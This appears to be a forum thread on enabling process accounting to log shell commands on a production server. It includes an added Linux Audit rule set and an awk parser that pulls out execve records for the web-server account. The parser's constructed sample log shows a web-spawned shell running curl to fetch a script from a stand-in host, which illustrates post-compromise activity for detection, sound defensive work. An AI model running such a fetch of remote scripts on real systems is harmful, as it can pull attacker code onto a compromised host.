I've been thinking of enabling process accounting on a production server as a proactive security measure to monitor what's being run on the system.
Looking at the initial documentation, it appears that enabling process accounting on a busy system might result in a significant amount of disk space being used to log and store the system process information.
Anyone know what the best recommendations are for enabling process monitoring? Also, any considerations on the setup, especially since this is a production server?
Ideally, I'd just want to log any shell commands, including PHP exec(), system(), passthru(), etc.
-Tony
You might want to try Linux Audit, or psacct/acct. I haven't used either of these systems, so I can't say much about their efficacy.
If all you want to do is make your users' .bash_history persistent, give this howto a look.
If you are concerned about disk space issues, you might want to consider a central log server. You can also tweak the logrotate settings to accommodate the pace of the logs.
As for my considerations on setting up process monitoring on your production server... unless you have done this before and know exactly what you're doing, I'd recommend thoroughly testing this on a development or staging machine first. A production server is not the place to be trying new things, at least in my opinion.
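For the "log PHP exec()/system()/passthru()" case specifically, here is what the Linux Audit route looks like end to end, as an added example that is not from either poster. PHP's exec-family functions run the command through `sh -c`, so on the audit side they appear as an execve() of the shell by the web-server account. The block defines an audit rule set (uid 33 and the rules-file path are assumptions; 33 is the Debian/Ubuntu www-data default) and an awk parser that joins each tagged SYSCALL record with its EXECVE record and decodes the hex form auditd uses for arguments containing spaces. The audit records at the bottom are constructed for the example.

```shell
#!/bin/sh
# Added example for this thread, not code from either poster.
# Part 1: Linux Audit rules that record every execve() made by the web-server
#         account. uid 33 is assumed (the Debian/Ubuntu www-data default);
#         the rules-file path is assumed too.
# Part 2: an awk parser that joins the SYSCALL record (who, from which parent)
#         with its EXECVE record (the argv) using the shared event id, and
#         decodes the hex form auditd uses for any argument containing a space.
# The audit records at the bottom are constructed for the example, in the
# format auditd writes to /var/log/audit/audit.log.

# Rules for /etc/audit/rules.d/exec.rules, loaded with `augenrules --load`.
# Both ABIs are listed so 32-bit binaries are not missed, and the -k key lets
# `ausearch -k exec_log` pull these records back out later. Logging only
# execve() (not every syscall) keeps the volume manageable on a busy box.
audit_rules() {
    cat <<'EOF'
-a always,exit -F arch=b64 -S execve -F euid=33 -k exec_log
-a always,exit -F arch=b32 -S execve -F euid=33 -k exec_log
EOF
}

# Read audit.log records on stdin, print one line per exec tagged exec_log.
extract_exec_commands() {
    awk '
    # auditd hex-encodes a string (no quotes) when it holds a space, a quote
    # or a control character; "6C73202D6C61" is "ls -la".
    function hex2str(h,   i, s, hi, lo) {
        s = ""
        for (i = 1; i <= length(h); i += 2) {
            hi = index("0123456789ABCDEF", toupper(substr(h, i, 1))) - 1
            lo = index("0123456789ABCDEF", toupper(substr(h, i + 1, 1))) - 1
            s = s sprintf("%c", hi * 16 + lo)
        }
        return s
    }
    # name=value token -> value; quoted values are literal, unquoted EXECVE
    # arguments are hex (decode=1). SYSCALL numbers such as uid=33 stay as is.
    function value(tok, decode,   v) {
        v = substr(tok, index(tok, "=") + 1)
        if (v ~ /^".*"$/) return substr(v, 2, length(v) - 2)
        if (decode) return hex2str(v)
        return v
    }
    # msg=audit(1300000000.001:101): -> 101, the id shared by all records
    # belonging to one event
    function event_id(line,   m) {
        match(line, /msg=audit\([0-9.]+:[0-9]+\)/)
        m = substr(line, RSTART, RLENGTH)
        sub(/.*:/, "", m)
        sub(/\)/, "", m)
        return m
    }
    /^type=SYSCALL / && /key="exec_log"/ {
        id = event_id($0)
        wanted[id] = 1
        for (i = 1; i <= NF; i++) {
            if ($i ~ /^uid=/)  uid[id]  = value($i)   # anchored: not auid/euid
            if ($i ~ /^ppid=/) ppid[id] = value($i)
            if ($i ~ /^exe=/)  exe[id]  = value($i)
        }
    }
    /^type=EXECVE / {
        id = event_id($0)
        if (!(id in wanted)) next            # logged by another rule, or no key
        argv = ""
        for (i = 1; i <= NF; i++) {          # a0= a1= ... but not argc=
            if ($i ~ /^a[0-9]+=/) argv = argv (argv == "" ? "" : " ") value($i, 1)
        }
        printf "event=%s uid=%s ppid=%s exe=%s argv=[%s]\n", id, uid[id], ppid[id], exe[id], argv
    }'
}

# Constructed records: a PHP exec("ls -la /var/www") shows up as `sh -c` with
# the command hex-encoded (event 101); event 102 is root at a terminal with no
# key and must be ignored; event 103 is a child (ppid=1235) of event 101's shell.
SAMPLE_AUDIT_LOG='type=SYSCALL msg=audit(1300000000.001:101): arch=c000003e syscall=59 success=yes exit=0 a0=55d0 a1=55d1 a2=55d2 a3=0 items=2 ppid=1234 pid=1235 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" key="exec_log"
type=EXECVE msg=audit(1300000000.001:101): argc=3 a0="sh" a1="-c" a2=6C73202D6C61202F7661722F777777
type=SYSCALL msg=audit(1300000000.002:102): arch=c000003e syscall=59 success=yes exit=0 a0=55d0 a1=55d1 a2=55d2 a3=0 items=2 ppid=1 pid=900 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts0 ses=3 comm="ls" exe="/bin/ls" key=(null)
type=EXECVE msg=audit(1300000000.002:102): argc=1 a0="ls"
type=SYSCALL msg=audit(1300000000.003:103): arch=c000003e syscall=59 success=yes exit=0 a0=55d0 a1=55d1 a2=55d2 a3=0 items=2 ppid=1235 pid=1236 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="curl" exe="/usr/bin/curl" key="exec_log"
type=EXECVE msg=audit(1300000000.003:103): argc=3 a0="curl" a1="-s" a2="http://example.invalid/x.sh"'

# Demo run over the constructed records; on a real host feed it
# `ausearch -k exec_log --raw` instead.
printf '%s\n' "$SAMPLE_AUDIT_LOG" | extract_exec_commands
```

The two lines the demo prints are the web account's `sh -c ls -la /var/www` and the `curl` it spawned, with the root shell filtered out by the key. The ppid chain is what lets you tell a PHP-spawned shell (parent is the php-fpm or Apache worker) from an interactive one, and it is the field to pivot on once you find something unexpected.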